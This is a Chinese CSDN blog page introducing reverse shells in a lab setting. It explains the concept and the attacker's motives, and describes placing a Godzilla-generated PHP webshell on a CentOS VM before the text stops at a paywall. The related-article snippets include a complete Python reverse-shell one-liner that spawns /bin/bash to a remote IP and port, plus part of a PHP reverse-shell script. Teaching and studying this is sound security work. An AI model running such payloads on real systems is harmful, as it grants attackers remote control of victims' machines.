反弹Shell的基本操作

最新推荐文章于 2024-07-24 13:04:25 发布
最新推荐文章于 2024-07-24 13:04:25 发布
阅读量996 收藏 4
点赞数
文章标签: linux centos 架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46831054/article/details/121567240
版权

反弹shell定义:

反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

为什么要反弹shell?

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

有如下情况:

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。
2.目标机器的ip动态改变,你不能持续控制。
3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。
4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。
那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

操作:

1.在Java环境下通过哥斯拉获取php脚本,编辑名任取,这里为:123.php

请添加图片描述
请添加图片描述

2.将脚本123.php拉入centos中/var/www/html文件夹下

请添加图片描述

3.我们此时分别用CentOS 7和kali两个虚拟机完成以下操作。
方法一:

最低0.47元/天 解锁文章
深渊渔火
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ 隧道技术 ] 反弹shell的集中常见方式(四)python反弹shell
qq_51577576的博客
09-06 1316
python反弹shell python2 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.192.1',55555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
nc的基本操作反弹shell
sweetie 的博客
05-09 9262
一、nc简介 nc 在网络工具中有“瑞士军刀”美誉 ,所做的就是在两台电脑之间建立链接,并返回两个数据流。 可运行在TCP或者UDP模式,添加参数 ----u 则调整为UDP,默认为TCP 即可用在windows系统也可在linux系统,也可作用于二者之间,只是对应的命令有些差异。 二、nc常用参数 -l 开启监听 -p 指定一个端口 -v 显示详细输出 -e 指定对应的应用程序 -n nc不要DNS反向查询IP的域名 -z 连接成功后立即关闭连接 三、建立C-S连接 1 环境
反弹shell详细易懂讲解,看这一篇就够了
LCW991207的博客
05-26 1428
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
关于反弹shell的学习
weixin_74020633的博客
06-14 634
反弹Shell(也称为反向Shell)是一种技术,通常用于远程访问和控制目标计算机。反弹Shell的工作原理是,目标计算机主动发起连接到攻击者的计算机,从而绕过一些常见的安全措施,如防火墙和NAT(网络地址转换)。这种技术常用于合法的远程管理和测试环境中,但也可能被恶意攻击者利用进行未授权的远程控制。通俗一点讲就是当存在一台攻击机和一台被攻击机时,攻击机(也就是客户端)连接被攻击机(服务端)叫做正向连接,那么反弹shell就是反向的连接,客户端为被攻击机,服务端为攻击机,由被攻击机连接攻击机。
c语言编写反弹shell源码,渗透不会反弹shell?来教你写一个cmd的shell
weixin_39942474的博客
05-22 741
原创 lengyi 合天智汇包含的库:#include #include #include #include #include #pragma comment(lib, "Ws2_32.lib")#define DEFAULT_BUFLEN 1024winsock2和ws2tcpip两个库文件是用来初始化网络套接字的。windows用来初始化一些windows下的函数,string方便我们后面的...
各种shell反弹方法_python反弹shell脚本
2401_84972726的博客
05-14 768
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
PHP代码实现反弹shell
E1even的博客
08-28 3756
打靶机的时候遇到了,有时候反弹效果失败,下面这个PHP代码基本可以通杀 转载至链接:https://www.cnblogs.com/alex-13/p/3667790.html <?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists(
反弹shell检测的一些思路
2401_84466225的博客
06-18 920
反弹shell是攻击者常用的手段之一,通过反弹Shell,攻击者可以绕过防火墙,获取目标系统的shell访问权限,进行后续的恶意操作。因此,及时检测并阻止反弹Shell行为对于安全防护来说非常重要。本文通过介绍反弹shell的常用手段,探讨检测的思路以及简单的代码实现。
metasploit使用和反弹shell
Wrop的博客
06-27 966
metasploit和msfvenom使用、反弹shell的理解
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 3326
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
这种细致的分析有助于深入理解反弹shell的运作机制,并在实际操作中灵活应用。 通过本文的深度解析,读者可以了解到反弹shell的多样性和复杂性,以及如何根据具体需求选择合适的反弹方式。这对于提高渗透测试的专业...
反弹shell1
08-03
反弹Shell是一种黑客技术,常用于渗透测试和恶意攻击中,它允许攻击者远程控制目标系统。在这种场景下,攻击者通常在自己的机器上设置一个监听服务,然后在目标机器上执行特定的命令,使得目标机器的Shell(命令行...
反弹shell资源:Rust实现的简单反弹Shell例子
05-18
反弹Shell的基本工作原理是:攻击者首先在目标系统上植入一个后门,该后门会在启动时连接回攻击者的控制端。当这个连接成功建立时,攻击者就可以通过这个通道发送命令并获取结果,从而实现对目标系统的远程控制。 ...
好用的cmdshell反弹工具
06-19
2. **命令行接口(CMD)**:CMD是Windows操作系统中的一个基本组件,提供了一个交互式环境来执行各种系统命令。在远程控制场景中,CMD shell允许攻击者执行系统命令,如文件操作、进程管理等。 3. **config.exe**:...
solairs shell cmd
04-03
了解并熟练掌握这些Solairs Shell Cmd的基本操作和高级特性,能极大地提升你在Solairs系统上的工作效率和问题解决能力。不过,由于具体的Solairs Shell Cmd特性和命令并未详细给出,这里提供的是一般性的Shell知识。...
Linux:基础命令学习
qq_55038440的博客
07-20 1511
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
LINUX之MMC子系统分析
gy794627991的博客
07-23 1102
MMC子系统从协议到源码分析
RockyLinux 9 PXE Server bios+uefi 自动化部署 RockLinux 8 9
最新发布
极致,细节
07-24 115
PXE(Preboot eXecution Environment,预启动执行环境)是一种网络启动协议,允许计算机通过网络启动而不是使用本地硬盘。PXE服务器是实现这一功能的服务器,它提供了启动镜像和引导加载程序,使得客户端计算机可以通过网络启动并安装操作系统或运行其他软件。
sparkshell基本操作
10-25
下面是Spark-Shell基本操作: 1. 启动与关闭Spark-Shell:在Linux命令行中输入spark-shell即可启动Spark-Shell,输入:quit或者:q即可关闭Spark-Shell。 2. 使用Spark-Shell进行Scala编程:在Spark-Shell中可以直接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值